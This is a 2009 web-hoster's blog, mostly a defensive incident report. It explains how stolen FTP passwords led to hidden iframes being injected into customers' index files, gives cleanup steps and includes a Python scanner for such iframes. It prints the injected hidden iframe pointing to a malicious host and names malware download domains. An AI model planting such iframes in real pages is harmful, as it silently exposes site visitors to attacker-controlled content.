November 18, 2009
Feel free to surf my new photoshoot gallery at http://matnet.my
July 24, 2009
As Salam to all,
New Promotion:
5 GB space
60GB Bandwidth
Park/Addon Domain allowed
Unlimited MySQL, email, FTP, subdomain
CPANEL control panel
Fantastico.
+ FREE domain .com.my net.my org.my
Interested? Buzz YM matnet80
July 15, 2009
In the last 2 weeks I got 2 issues regarding this matter.
The scenario:
All index* files were edited to redirect to a malicious website using an iframe.
Example:
iframe src="http://u9k.ru:8080/index.php" width=151 height=125 style="visibility: hidden">
After investigation:
1. The file owner is the current user, not nobody or any other account.
2. The files were uploaded by the user with the right access authentication.
3. All index* files in the user's www directory were edited.
4. Only the current user is infected.
How:
The FTP password was hacked.
There are 2 possible reasons for how the password was hacked.
1. Adobe Acrobat Vulnerability
I checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument”.
If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.
This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151).
Quoted from: http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
2. FileZilla Vulnerability.
How to clean up:
1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
4. Now remove the malicious code (the iframes) from your files on the server. The easiest way to do it is to upload clean content from a backup.
5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
6. If your site was flagged by Google, request a malware review via Webmaster Tools.
7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.
8. Regularly update third-party software on your PC.
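For steps 4 and 5, here is an added example (not code from this post or from the quoted article) that walks a web root and lists index* files carrying an iframe that is hidden from the visitor and loads a remote URL, together with the owner uid and modification time used in the investigation above. The sample tag and its host name are constructed, and the hidden-iframe markers checked are an assumption based on the injected tag shown earlier.

```python
import os
import re
import sys
import time

# Constructed sample, shaped like the injected tag described in this post.
SAMPLE = ('<iframe src="http://malicious.example:8080/index.php" '
          'width=151 height=125 style="visibility: hidden"></iframe>')

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Markers of an iframe the visitor is not meant to see (assumed set).
HIDDEN = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none"
    r"|\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I)

def hidden_iframes(html):
    """Return the src of every iframe that is hidden and loads a remote URL."""
    hits = []
    for tag in IFRAME.findall(html):
        src = SRC.search(tag)
        if (src and HIDDEN.search(tag)
                and re.match(r"(?:https?:)?//", src.group(1), re.I)):
            hits.append(src.group(1))
    return hits

def scan(webroot):
    """Return (path, owner uid, mtime, urls) for each infected index* file."""
    results = []
    for folder, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().startswith("index"):
                continue
            path = os.path.join(folder, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    urls = hidden_iframes(fh.read())
                st = os.stat(path)
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if urls:
                results.append((path, st.st_uid, st.st_mtime, urls))
    return results

if __name__ == "__main__":
    for path, uid, mtime, urls in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        print(f"{path}\tuid={uid}\tmodified={stamp}\t{', '.join(urls)}")
```

Run it with the account's web root as the only argument. Matching modification times across the listed files help narrow down which FTP session to look for in the server's transfer log.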
April 13, 2009
April 6, 2009
Celcom broadband doesn't work well with Streamyx DNS servers even though both are owned by TM.
Not only that, my dedicated server (in an IDC owned by TM) is also not recognized by the Celcom broadband DNS.
To all my customers who are using Celcom broadband: please use these DNS settings.
208.67.222.222 and 208.67.220.220

Click below for detailed instructions:
1. XP - https://www.opendns.com/start/device/windows-xp
2. Vista - https://www.opendns.com/start/device/windows-vista
3. 2000/NT - https://www.opendns.com/start/device/windows-2000_windows_NT
4. Ubuntu - https://www.opendns.com/start/device/ubuntu
5. Nokia S60 - https://www.opendns.com/start/device/nokia-s60